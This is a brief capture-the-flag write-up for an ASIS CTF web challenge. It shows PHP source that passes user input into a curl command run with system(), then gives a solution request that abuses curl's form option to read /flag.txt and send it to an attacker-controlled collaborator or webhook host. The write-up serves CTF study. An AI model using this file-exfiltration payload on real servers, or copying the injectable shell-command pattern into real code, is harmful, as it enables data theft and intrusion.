Source code of the challenge:
```
if($_SERVER['REMOTE_ADDR'] == '127.0.0.1'){ die('curl :thonk:');}

$url = 'http://localhost';
$method = 'GET';
$formParams = [];

if(isset($_GET['url'])){ $url = $_GET['url'];}
if(isset($_GET['method'])){ $method = $_GET['method'];}
if(isset($_GET['formParams'])){ $formParams = $_GET['formParams'];}

$cmd = 'curl ';
$cmd .= '--proto -file ';
$cmd .= escapeshellarg($url).' ';
$cmd .= '-X ';
$cmd .= escapeshellarg($method).' ';

foreach($formParams as $key => $value){
if(preg_match("/^\w+$/",$key)){
$cmd .= '-F ';
$cmd .= escapeshellarg($key.'= '.$value);
}
}

header('Content-Type: text/plain');
system($cmd);
```

Read the [curl manual](https://curl.se/docs/manpage.html) and use the following example as solution:
curl -F "submit=OK;headers=@headerfile" example.com

Request sent to the server:
```
GET /?url=[insert burp collaborator or webhook.site payload here]&method=GET&formParams[submit]=a;headers=@/flag.txt HTTP/1.1
Host: raas-v1.asisctf.com:9000
[...]
```

Request received on the burp collaborator/webhook.site from the server:
```
GET / HTTP/1.1
User-Agent: curl/7.74.0
[...]

ASIS{still-curl-df23a2f}
```